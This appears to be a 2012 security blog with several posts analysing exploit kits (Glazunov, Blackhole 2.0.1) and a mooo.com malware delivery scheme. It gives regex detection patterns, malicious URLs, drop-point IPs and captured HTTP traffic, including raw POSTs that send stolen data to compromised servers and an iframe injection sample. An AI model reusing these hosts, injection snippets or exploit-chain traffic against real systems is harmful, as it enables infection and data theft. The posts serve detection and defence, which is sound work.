<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrogkNUuH8bj1yGd2422jBppr-45h4zLlL-86s7Yv8z8jICKwxlajA4QXHNPBqhv8yHZE8Q3Hoi60dONc6kV-s3gZgHc_xKUimGW4kho0hCahiklGVJ82l_z4FjLpdXi12ALV3GzWS1HQ/s1600/moldova.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrogkNUuH8bj1yGd2422jBppr-45h4zLlL-86s7Yv8z8jICKwxlajA4QXHNPBqhv8yHZE8Q3Hoi60dONc6kV-s3gZgHc_xKUimGW4kho0hCahiklGVJ82l_z4FjLpdXi12ALV3GzWS1HQ/s400/moldova.PNG" width="400" /></a></div>
<h3>
<br /></h3>
<br />
Any feedback or further info, hit me up @fknsec<br />
<br />
I have not researched if any IDS (Snort) sigs match this pattern.<br />
<br />
HAPPY NEW YEAR<br />
<br />
<br />
<br />
<br />
<br />
References:<br />
http://urlquery.net/report.php?id=14666<br />
www.undroid.us/wordpress/?cat=19<br />
http://jsunpack.jeek.org/?report=fc505de91ae02e6ed905bb22746975e5d4d70c93<br />
http://forums.cnet.com/7726-6132_102-3375245.html<br />
Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-83821131156485834622012-12-16T05:36:00.000-08:002012-12-16T05:48:59.646-08:00Unrecognized URL Pattern Involving Malware BinariesIn the interests of keeping FPs to a minimum, i'm including the mooo.com, but pull it out if you want to test your site for FPs. This appears to be designed to deliver malware binaries<b> </b>and at this point I do not have further to share. I would keep an eye out for this one and feedback any info please @fknsec #teamwork. <br />
<br />
<br />
<div style="text-align: center;">
<u><b>Pattern type 1</b></u><br />
</div>
<div style="text-align: center;">
<b>mooo\.com\/\w{2,8}\d{3}\_\d{4}\.php\?\w{4,10}\=</b></div>
<div style="text-align: center;">
<br />
<u><b>Pattern type 2 (appears to be only binaries)</b></u></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>mooo.com\/\?\w{2,9}\=[a-zA-Z0-9]{16,}</b></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<b>Pattern type 1 examples:</b><br />
<br />
hxxp://www2.e77lzbgasyhun.mooo.com/udhnj106_5613.php?8tpb=XN/p2KKso9zwx9vOme7R2attqqGVi6eg0LeVj... <br />
2012-12-14 <br />
hxxp://www2.e77lzbgasyhun.mooo.com/zkzd106_5613.php?qamk2=lczm4W/ao6fi39bUh+jizLKjp5KgkaLOm3Sfo... <br />
2012-12-14 <br />
hxxp://www2.tf6qzs0witws-0.mooo.com/dxohf241_5874.php?zh2cgpfl=nt6gy92ty9rZ16mX79yUtJ6srqdToOPM... <br />
2012-12-14 <br />
hxxp://www2.f32w14gqqvnfax.mooo.com/owxryn107_5613.php?l4uv0n=kKfX723h3aek4ppa3NrVs6OckquSpN7ab... <br />
2012-12-14 <br />
hxxp://www2.id0hx24nz8.mooo.com/twp211_5613.php?wzapem=m+XV6aLa29ak0epYqdfedaywkqOL3dLIbZuek5bQ... <br />
2012-12-14 <br />
hxxp://www2.q04leu6wmk.mooo.com/nnxybd231_5619.php?qzgoh7=leXP26Wa0p6h14vqn9uqoKeroJXYoNVtZ5LG1... <br />
2012-12-14 <br />
hxxp://www2.r4qjwq40c4.mooo.com/uxm211_5613.php?te47u=mN6WobLaluLO6dWfVtid2KJpbaalWuHT265nVsSW1... <br />
2012-12-14 <br />
hxxp://www2.i9cofxif5uz6i7.mooo.com/vigpkh241_5688.php?9dyzjo2pw=Xdfn3eTnb+jg4KPd3ozt0spyqrBuoV... <br />
2012-12-14 <br />
hxxp://www2.r4qjwq40c4.mooo.com/taedi107_5613.php?11zq1=Vabf5ZWvq97N3eWtVtidlW6vp2KlWuHT265nVsS... <br />
2012-12-14 <br />
hxxp://www2.poqjik8iv0.mooo.com/yhxvgz106_5613.php?09rrso=VJ/o1djjrdLq193bno/rmZR2p6ikopbf2s6mn... <br />
2012-12-14 <br />
hxxp://www2.e77lzbgasyhun.mooo.com/bdj106_5613.php?cmlw7lm=h9jl7XTh2dWtnODniNzK17adq5+Wk9zgm6mg... <br />
2012-12-14 <br />
hxxp://www2.i9cofxif5uz6i7.mooo.com/fdje106_5613.php?pae5=lNjIodF2zuXL3NeMqt7ec55toZSLpdKdoKKM2...
/mxatxt241_5813.php?954u91o4yx=XZmV63af1Zvm4tPlj9uZ13KkbWemV6... <br />
2012-12-14 <br />
hxxp://www2.poqjik8iv0.mooo.com/dano107_5613.php?0bqhdq36=VNDX3Myul63e2+eQ3tScpqtmYZWX2M3VcGmW0... <br />
2012-12-14 <br />
hxxp://www2.poqjik8iv0.mooo.com/vqepgx107_5613.php?g9fm=i6fM4dis1eHX166P65nLdpujoaKX2tLPdZyckcm... <br />
2012-12-14 <br />
hxxp://www2.e77lzbgasyhun.mooo.com/ppjdu106_5613.php?mteo6tgk=kd/e5XPp09vbnKvZoNfQxbCunqahk+TO0... <br />
2012-12-14 <br />
<br />
<br />
<br />
Pattern Type 2: Binary<a href="http://www.zerovulnerabilitylabs.com/home/services/security-intelligence/"> (as per Exploit Shield)</a><br />
<br />
<table border="1"><tbody>
<tr><td>2012-12-13 17:13</td>
<td>http://www2.v-iy381t22z638.mooo.com/?0aimsen=VMTW0bDK5ttT3uKXdWara....</td>
<td>78d5758eebe3df79ffd40efef16af944</td>
<td align="center">7/45</td>
</tr>
<tr>
<td>2012-12-13 17:12</td>
<td>http://www2.v-iy381t22z638.mooo.com/?slwo4wee=l8%2Fk03Hc3cqcotLdcG....</td>
<td>597f409a3f786a960b8683b4bb9ebdc7</td>
<td align="center">12/46</td>
</tr>
<tr>
<td>2012-12-13 17:08</td>
<td>http://www2.v-iy381t22z638.mooo.com/?ugmrldkb=mcra1qnJ48ecotLdcG1o....</td>
<td>1526a20a234749ae4cd61fa1e95e8559</td>
<td align="center">12/46</td>
</tr>
<tr>
<td>2012-12-13 17:05</td>
<td>http://www2.v-iy381t22z638.mooo.com/?tkln=mM7Z0rOS4d5ZrZrYb2exbWle....</td>
<td>70bc0edd237458587de240b8ef71a0d5</td>
<td align="center">scanning...</td>
</tr>
<tr>
<td>2012-12-13 17:04</td>
<td>http://www2.v-iy381t22z638.mooo.com/?xl0r=nM%2Bd1rOS4d5ZrZrYb2exbW....</td>
<td>337ac36ee8544e342200a85e38c88ce6</td>
<td align="center">12/46</td></tr>
</tbody></table>
<table border="1"><tbody>
<tr><td>2012-12-14 13:52</td>
<td>http://www2.fmrmta0nhmql95.mooo.com/?4audhacuw1=WMTiyKXG29qdps%2FR....</td>
<td>7261465fae1c1d0a9c776658c91da6a8</td>
<td align="center">11/46</td>
</tr>
<tr>
<td>2012-12-14 13:51</td>
<td>http://www2.fmrmta0nhmql95.mooo.com/?hyvxj=jNzj3KfL5deT6cqUq52joaJ....</td>
<td>6806bfa3b01fda85105dc265bfb625e2</td>
<td align="center">11/46</td>
</tr>
<tr>
<td>2012-12-14 13:49</td>
<td>http://www2.fmrmta0nhmql95.mooo.com/?191lqzd=VZye0K7f3MuT59bYnmWkm....</td>
<td>837b7e8a971805b33b2822677dd446a9</td>
<td align="center">scanning...</td></tr>
</tbody></table>
<table border="1"><tbody>
<tr><td>2012-12-14 08:01</td>
<td>http://www2.g8gbbckylo8.mooo.com/?smbvs0=l9DP2rCV352N18vHqK6kp22Z4....</td>
<td>49448bafc166568b3b8af8f7fc285ca5</td>
<td align="center">9/45</td>
</tr>
<tr>
<td>2012-12-14 08:00</td>
<td>http://www2.g8gbbckylo8.mooo.com/?hgsx1=jMrg3G7MsMyI18zPtqGncJ2N5%....</td>
<td>e426696ef1f1b8c2814c7330cdd9a916</td>
<td align="center">9/45</td></tr>
</tbody></table>
<table border="1"><tbody>
<tr><td>2012-12-14 01:33</td>
<td>http://www2.ie8qrahzp1jfg4.mooo.com/?uhsr2ea=mcvg1m%2FK2c6LrdrWnp2....</td>
<td>42bd8297b01e1c1a50cf16a74ed8595a</td>
<td align="center">16/45</td></tr>
</tbody></table>
<br />
<b><br /></b>
Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-56931460196945396392012-12-07T15:41:00.000-08:002012-12-07T18:23:58.762-08:00Case Study: Exploiting Weakness To Quietly Exfiltrate Data<span style="font-family: inherit;">As per Emergingthreats, this is the </span><span style="background-color: whitesmoke; color: #333333; font-family: Arial, sans-serif; font-size: 13.63636302947998px; line-height: 17.999998092651367px;">Glazunov exploit kit.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">This particular case is an excellent example to demonstrate that malware authors do their best to avoid detection and do not play by the internet rules. The utilization of defense in depth is a critical component to any information security program and would assist in limiting the damage from an attack of this nature.</span><br />
<span style="font-family: inherit;"><br /></span>
This example shows:<br />
<ul>
<li>A compromised site/malicious site which is, for the better part, unrecognized.</li>
<li>A redirect to HTTP TCP port 8080 direct to IP</li>
<li>Content delivery which appear innocuous in URL logs.</li>
<li>Java exploits which are not detected by virtually any AV</li>
<li>Malware which is not detected</li>
<li>Exfiltration of data on high ports showing as only TCP connections</li>
<li>Utilizing other people's IP addresses as drop points</li>
</ul>
<br />
<h3>
<span style="font-family: inherit;">This was achieved because of the following gaps in security:</span></h3>
<br />
<ul>
<li>Endpoint did not have updated Java version and was vulnerable</li>
<li>Web filtering did not block direct to IP requests</li>
<li>Layer 7 filtering was not performed at the perimeter (IPS) for the exploit code.</li>
<li>AV did not detect the malware</li>
<li>Outbound ports were not restricted. The endpoint could communicate outbound.</li>
</ul>
<br />
<span style="font-family: inherit;"><br /></span>
<br />
<pre style="font-size: 13px;"></pre>
<pre><pre style="font-size: 13px;"><b><span style="font-family: inherit;">The entry point is a 301 redirect, however </span></b><b><span style="font-family: inherit;">the content length is a28 and there is what AVG recognizes as a Blackhole redirect in the 301 response. </span></b></pre>
<pre><span style="font-family: inherit;">hxxp://www.helloooooo.com/2009/01/splinter-impostor-claims-worlds-longest-hair/</span></pre>
<span style="font-size: xx-small;">This is a dangerous website and should not be visited in a browser.</span>
<pre></pre>
<pre><span style="font-family: Courier New, monospace;">
</span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCt7s4l7a8QesDjbQZO5YnUmjXaIMj1-gHXGK6AHZEcKs6HBtyTybxRBTMO88ozg-irMlVEdfxjANIMyFT9MqySg242QxAMr6uTClawKrL1pGS9SRA6pnW8VbA6p8H5aU7BrJIdBhOZm8/s1600/helllo.com+entry+point.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="484" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCt7s4l7a8QesDjbQZO5YnUmjXaIMj1-gHXGK6AHZEcKs6HBtyTybxRBTMO88ozg-irMlVEdfxjANIMyFT9MqySg242QxAMr6uTClawKrL1pGS9SRA6pnW8VbA6p8H5aU7BrJIdBhOZm8/s640/helllo.com+entry+point.png" width="640" /></a></div>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;"></pre>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;"><b>The next step is for me to get the redirect URL.</b></pre>
<pre><span style="font-family: Courier New, monospace;">
</span></pre>
<pre><span style="font-family: Courier New, monospace;"><span style="color: red;">GET /2009/01/splinter-impostor-claims-worlds-longest-hair/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.helloooooo.com
Connection: Keep-Alive</span>
</span><span style="font-family: 'Courier New', monospace; font-size: 13px;">
</span></pre>
<pre><span style="font-family: 'Courier New', monospace; font-size: 13px;"><b>And gives me a gift... to quote my friend Tarun.</b></span></pre>
<pre><span style="color: red; font-family: Courier New, monospace;">HTTP/1.1 200 OK
Date: Tue, 27 Nov 2012 00:10:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Pingback: http://www.helloooooo.com/xmlrpc.php
Link: <http://www.helloooooo.com/?p=1892>; rel=shortlink
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
5244
<script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];</span></pre>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;"></pre>
<pre></pre>
<pre><span style="font-family: Courier New, monospace;"><b>
</b></span></pre>
<pre><span style="font-family: Courier New, monospace;"><b>The redirect is to a rigo6680.zapto.org/?go=2, this is consistent with TDS redirects.</b></span></pre>
<pre><span style="font-family: Courier New, monospace;">
</span></pre>
<pre><span style="font-family: Courier New, monospace;"><a href="http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b">http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b</a></span></pre>
<pre><span style="font-family: Courier New, monospace;">
</span></pre>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;">Additional redirects appear everywhere on the page, see the CSS redirect below.</pre>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;"></pre>
</pre>
<b>Redirect from a CSS file.</b><br />
<a href="http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725">http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725</a><br />
<br />
<h3>
<b>What happens next?</b></h3>
<br />
The following URL chain occurs. Included in here is a youtube video, 74.125.x.y ip address.<br />
<br />
<br />
609 31.956187 10.1.2.3 -> 74.125.236.9 HTTP 408 GET /v/hYaYCPmFWKw&hl=en&fs=1 HTTP/1.1<br />
613 32.126215 10.1.2.3 -> 65.163.12.222 HTTP 454 GET /wp-content/themes/twentyten/images/wordpress.png HTTP/1.1<br />
616 32.196442 65.163.12.222 -> 10.1.2.3 HTTP 1152 HTTP/1.1 200 OK (PNG)<br />
625 32.545505 74.125.236.9 -> 10.1.2.3 HTTP 674 HTTP/1.1 200 OK (application/x-shockwave-flash)<br />
637 33.374071 10.1.2.3 -> 64.34.183.111 HTTP 335<span style="color: red;"> <b>GET /2354796716/12230</b> </span>HTTP/1.1<br />
673 33.543459 10.1.2.3 -> 74.125.236.1 HTTP 382 GET /yts/swfbin/watch_as3-vfl1ubMZd.swf HTTP/1.1<br />
688 33.587050 64.34.183.111 -> 10.1.2.3 HTTP 104 HTTP/1.1 200 OK (application/x-java-archive)<br />
695 33.626438 10.1.2.3 -> 64.34.183.111 HTTP 292 <b><span style="color: red;">GET /2354796716/12230</span></b> HTTP/1.1<br />
744 33.867125 64.34.183.111 -> 10.1.2.3 HTTP 104 HTTP/1.1 200 OK (application/x-java-archive)<br />
770 34.193535 10.1.2.3 -> 64.34.183.111 HTTP 245<span style="color: red;"> <b>GET /15692</b></span> HTTP/1.1<br />
931 34.501338 64.34.183.111 -> 10.1.2.3<b> HTTP/DL 958 unknown (0x4d)</b><br />
<b><br /></b>
<b>Here's the Java.</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgInrndUzq9UyFrmn7bbyohLjqk8cbCD-CVfvmP0kIT5lebf__MA3zKDto5IZuxLvGTQ700N910zNXiBBi3wxpJnjEnPPYfqst5MwX_P8AgTxlfQGfZBqeDoLSjelnXLjbt8HEuAxYQg5g/s1600/hellooo.pkfile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgInrndUzq9UyFrmn7bbyohLjqk8cbCD-CVfvmP0kIT5lebf__MA3zKDto5IZuxLvGTQ700N910zNXiBBi3wxpJnjEnPPYfqst5MwX_P8AgTxlfQGfZBqeDoLSjelnXLjbt8HEuAxYQg5g/s640/hellooo.pkfile.png" width="640" /></a></div>
<b><br /></b>
<br />
<b>And we run the Java, which contains CVE 2012-1723 and the binary materializes and is executed immediately.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYgyzYgupiZsFBI0zAnrCeL1fLn2xq6hg1ZFNII0pWyUC_VgE81fZpWvbJ-cwyZ0sEmoIyEku_qOl4A1oyu89vZCLDBoerHYeKNkBdjNw2ENfmq-JSbNakacBaUQP6P95gSYlS9d29Bes/s1600/hello+exe+file.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYgyzYgupiZsFBI0zAnrCeL1fLn2xq6hg1ZFNII0pWyUC_VgE81fZpWvbJ-cwyZ0sEmoIyEku_qOl4A1oyu89vZCLDBoerHYeKNkBdjNw2ENfmq-JSbNakacBaUQP6P95gSYlS9d29Bes/s640/hello+exe+file.PNG" width="640" /></a></div>
<br />
<h3>
Posting Data to Drop Points</h3>
<br />
What we get are connections on TCP port 35516 posting data to compromised Windows servers online. <b>What is interesting about this is that it is not recognized as HTTP</b>. It is only protocol TCP and on outbound port 35516. This would fly under the radar of many detection mechanisms.<br />
<br />
This infection is a wonderful case study in an infection chain using difficult to detect methods and exploiting weaknesses in infrastructure, perimeter security and vulnerable workstation software.<br />
<br />
Four IP addresses were drop points:<br />
131.96.243.22<br />
74.59.207.114<br />
68.197.117.117<br />
87.203.78.137<br />
<br />
The infection point is 64.34.183.111:8080<br />
<br />
Here is what the Posting looks like.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4VMR7z7n3_xxfpbykQ86h4Vl90cTuk-sUJBDwnttZCV-6yQx8vfQHGN8oaqmT4_Cgj10VlCstSUkDvYbcluVY6QKSWmyaEidbCCgGbsVrvRMcY_fiXyWx816mt33RWj_XJapMoIhXBbw/s1600/helloo+posting.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4VMR7z7n3_xxfpbykQ86h4Vl90cTuk-sUJBDwnttZCV-6yQx8vfQHGN8oaqmT4_Cgj10VlCstSUkDvYbcluVY6QKSWmyaEidbCCgGbsVrvRMcY_fiXyWx816mt33RWj_XJapMoIhXBbw/s640/helloo+posting.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Cl4tLExlGaexmI7US-G7Yp8fHsn7-2-IcHz9Si5sjh5uPpaf-tYd7VZwQv4bzYT2ma7QcPns2SJJlJWL1IC7vRn41brzqln2M-Sq8Nni4s99zUKe2Gpo_usr7zuEWLti_05srwcjTZA/s1600/helloo+posting.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Cl4tLExlGaexmI7US-G7Yp8fHsn7-2-IcHz9Si5sjh5uPpaf-tYd7VZwQv4bzYT2ma7QcPns2SJJlJWL1IC7vRn41brzqln2M-Sq8Nni4s99zUKe2Gpo_usr7zuEWLti_05srwcjTZA/s640/helloo+posting.PNG" width="640" /></a></div>
<br />
<br />
<br />
<br />
<b>VT for Jar file. CVE 2012-1723 - 2/46</b><br />
<pre class="dualColTextStyle" hasbox="2">https://www.virustotal.com/file/4f88dd9dbeaba9a59ab1c077b4e98be72c66e59f79ad8cc95c0952530ca698f3/analysis/1354328781/</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">ed-309-aaenak<span style="background-color: white; color: #002b82; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; white-space: normal;">.</span>gsu.edu</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Raw POST information</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">POST /nymain/nm1932719/index.php HTTP/1.1
Host: 131.96.243.22
Content-Length: 54
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
filename=bphgt.ntz&data=œT¬»ñOõ[!5a9±r8ÆàSÞ¼ƒAôˆPöêÙ</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">HTTP/1.1 200 OK
Content-Length: 4
Connection: close
[</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">------------------------------------------------------------------</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">POST /nymain/nm1932719/index.php HTTP/1.1
Host: 74.59.207.114
Content-Length: 58
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
filename=skjlrke.kcf&data=¾¤±ß]NçWB\—%~}SóCå£tZ‡£¬4Ø–‘</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><div hasbox="2">
<span id="drill-22-partial" style="color: red;"></span><span hasbox="2" id="drill-22-data"><span hasbox="2">videotron.ca</span> <span hasbox="2">(1)</span> </span><br />
<span hasbox="2">
</span>
<span hasbox="2">Host: </span>modemcable114<span style="background-color: white; color: #002b82; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; white-space: normal;">.</span>207-59-74<span style="background-color: white; color: #002b82; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; white-space: normal;">.</span>mc<span style="background-color: white; color: #002b82; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; white-space: normal;">.</span>videotron.ca</div>
</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<h3>
<br /></h3>
<div>
<span style="font-size: small; font-weight: normal;"><br /></span></div>
<div>
<span style="font-size: small; font-weight: normal;">@fknsec</span></div>
<pre class="dualColTextStyle" hasbox="2"><span style="font-size: xx-small;">
</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-size: xx-small;">All investigations were performed in my personal lab. This article's content and any opinions expressed are not the opinions of any past, present or future employer. Lawyers are our friends.</span></pre>
Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-79516616514805000342012-11-24T12:57:00.000-08:002012-11-24T12:57:17.922-08:00Blackhole 2.0.1 Exploit - URL Pattern<h2>
</h2>
<h2>
Blackhole Exploit Kit 2.0.1 - URL Pattern</h2>
<h2>
<span style="font-family: inherit; font-size: x-small; font-weight: normal;">Written by Frank Angiolelli, CISSP</span></h2>
<div>
<br /></div>
<div style="text-align: center;">
<div style="text-align: left;">
Blackhole 2.0 has evolved into Blackhole 2.0.1 which incorporates the 2012-5076 and the URL structure has evolved. Currently, there are iframes built with adjustments to the URL that include what appear to be hard coded values.</div>
</div>
<div>
<br />
<b>Example:</b><br />
<span style="color: red;"><iframe src="/obtaining/notify- publishes_ post-used. php?tvipazdb=1l:1f:33:1n:1j&bkb=j& zizcdg=30:1n:1h :30:1n:33:30:1m: 2v:32& edd=1f:1d:1f:1d:1f: 1d:1f"></iframe></span><br />
<br />
<br />
<h3>
<b>The PDF:</b></h3>
<br />
The PDF get request that I have research and observed recently consistently contains the following string:<br />
<br />
<b>"1n:1d:1f:1d:1f:1d:1j:1k:1l"</b><br />
<br />
So patterned out, it looks like this:<br />
<br />
<div style="text-align: center;">
<b>\.php\?\w{2,8}\=((1|2|3)[a-z0-9]\:){4}(1|2|3)[a-z0-9]\&\w{2,8}\=[a-z0-9]{2}\&\w{2,8}\=((1|2|3)[a-z0-9]\:){9}(1|2|3)[a-z0-9]\&\w{2,8}\=1n\:1d\:1f\:1d\:1f\:1d\:1j\:1k\:1l</b></div>
<br />
Additionally, it appears that the second parameter value is consistently a 2 character value, though no longer hexadecimal. Ostensibly, the structure pattern is the same with some minor variations to throw off detection. <br />
<br />
It should be noted this may not catch every single variation, but currently I know there are enough matches to make this likely valuable.<br />
<br />
<b>Examples:</b><br />
<span style="color: red;">/links/excuse_lorrys-names-carries.php?iucvwm=2w:31:33:1o:1g&rxjw=3j&aqpmcap=2w:1k:30:31:1j:1h:33:1m:1f:33&zprptb=1n:1d:1f:1d:1f:1d:1j:1k:1l</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">/pleasing/forward-facts.php?dht=1g:2v:33:2v:2w&hxala=33&nbz=33:1l:1g:2v:30:1m:33:32:1l:1k&zrchhlmf=1n:1d:1f:1d:1f:1d:1j:1k:1l </span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">hxxp://cosmic-calls.net/detects/mixing-evened-quits-spot.php?xpu=2w:31:33:1o:1g&ftzajz=3a&jlzjamgn=1k:2w:32:30:1n:1h:33:31:2v:2w&xlxsjzzi=1n:1d:1f:1d:1f:1d:1j:1k:1l</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">/less/pounds-value_mean.php?fhkguehd=31:2v:30:1i:1o&vcyvea=36&qpqvia=1n:30:30:31:2v:2w:1o:1f:1f:31&pjqnyncg=1n:1d:1f:1d:1f:1d:1j:1k:1l</span><br />
<br />
<h3>
The Java:</h3>
<br />
The Java request when used as the direct exploit is identical to the entry point URL in my investigations, however the content type is adjusted to application/x-java-archive. See the exploit chain towards the end of this article. I am unsure of what the structure looks like after a PDF is served.<br />
<br />
<h3>
The Binary:</h3>
Additionally, the URL structure is in a similar format to the 2.0 URL structure in that the binary get request first parameter has 10 characters - though they are no longer hex and the second parameter contains 20 characters - again, not hex. These values are now separated by colons.<br />
<br />
An the binary get request appears at this time to match the following pattern. Please feedback any false positives to me. This is slightly wide to allow for additional variants I may not be seeing. Suggestions for adjustments, optimization or false postives - please feedback to @fknsec.<br />
<br />
<div style="text-align: center;">
<b>\.php\?(\w{2,8}\=((1|2|3)[a-z0-9]\s?\:\s?){4}(1|2|3)[a-z0-9]\&)(\w{2,8}\=((1|2|3)[a-z0-9]\s?\:\s?){9}(1|2|3)[a-z0-9]\&)\w{1,8}\=\w{2}\&\w{2,8}\=\w{1,8}\&\w{2,8}\=\w</b></div>
<br />
The primary difference observed at this point is that the Blackhole 2.0.1 favors serving the Java 2012-5076 exploit before the Adobe PDF is served, as seen with systems having Java 6u35 and Adobe 9.x. In my previous article on Blackhole 2.0, the kit exclusively served a PDF file first.<br />
<br />
<b>Binary Examples:</b><br />
<span style="color: red;">/less/pounds-value_mean.php?if=1i:1m:2w:1g:1o&pe=1n:30:30:31:2v:2w:1o:1f:1f:3</span><br />
<span style="color: red;">1&k=1f&rg=m&ht=b</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">hxxp://62.109.24.128/links/excuse_lorrys-names-carries.php?df=1o:1l:31:1o:1f&ne=2w:1k:30:31:1j:1h:33:1m:1f:33x=1ffb=gci=b</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">http://syenial.com/links/1.php?rf=1k:1g:1i:1i:1m&oe=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&p=1f&rq=x&vf=d</span><br />
<br />
<h3>
Blackhole 2.0.1 In Action:</h3>
<br />
GET /less/pounds-value_mean.php HTTP/1.1<br />
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*<br />
Accept-Language: en-us<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Accept-Encoding: gzip, deflate<br />
Host: u91s.info<br />
Connection: Keep-Alive<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.0.15<br />
Date: Sat, 24 Nov 2012 19:33:55 GMT<br />
<b>Content-Type: text/html</b><br />
Transfer-Encoding: chunked<br />
Connection: keep-alive<br />
<br />
<br />
f86<br />
<html><head><title></title></head><body><object classid="clsid:8AD9C840-044E-11D1<br />
-B3E9-00805F499D93" codebase="http://java.sun.com/update/1.6.0/jinstall-6u60-wind<br />
ows-i586.cab#Version=6,0,0,0" WIDTH="200" HEIGHT="200" ><PARAM NAME="CODE" VALUE=<br />
"hw"><PARAM NAME="ARCHIVE" VALUE="/less/pounds-value_mean.php"><param name="type"<br />
value="application/x-java-applet"><param name="val" value="0b0909041f"/><param n<br />
ame="prime" value="3131213e37193c323a2c173143351919310417213a0019220e1a4321350c23<br />
351a3a3c040b043d322c3937321f37231f270a1f37051f371702043539373a1f081c1f081c1f08371<br />
f270e1f270a1f37171f372c1f372c1f0837021139372c0244053923020b093928"/></<br />
<br />
<br />
<br />
<br />
<b>Then:</b><br />
<br />
<br />
<br />
<br />
GET /less/pounds-value_mean.php HTTP/1.1<br />
accept-encoding: pack200-gzip, gzip<br />
<b>content-type: application/x-java-archive</b><br />
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29<br />
Host: u91s.info<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive<br />
<br />
<br />
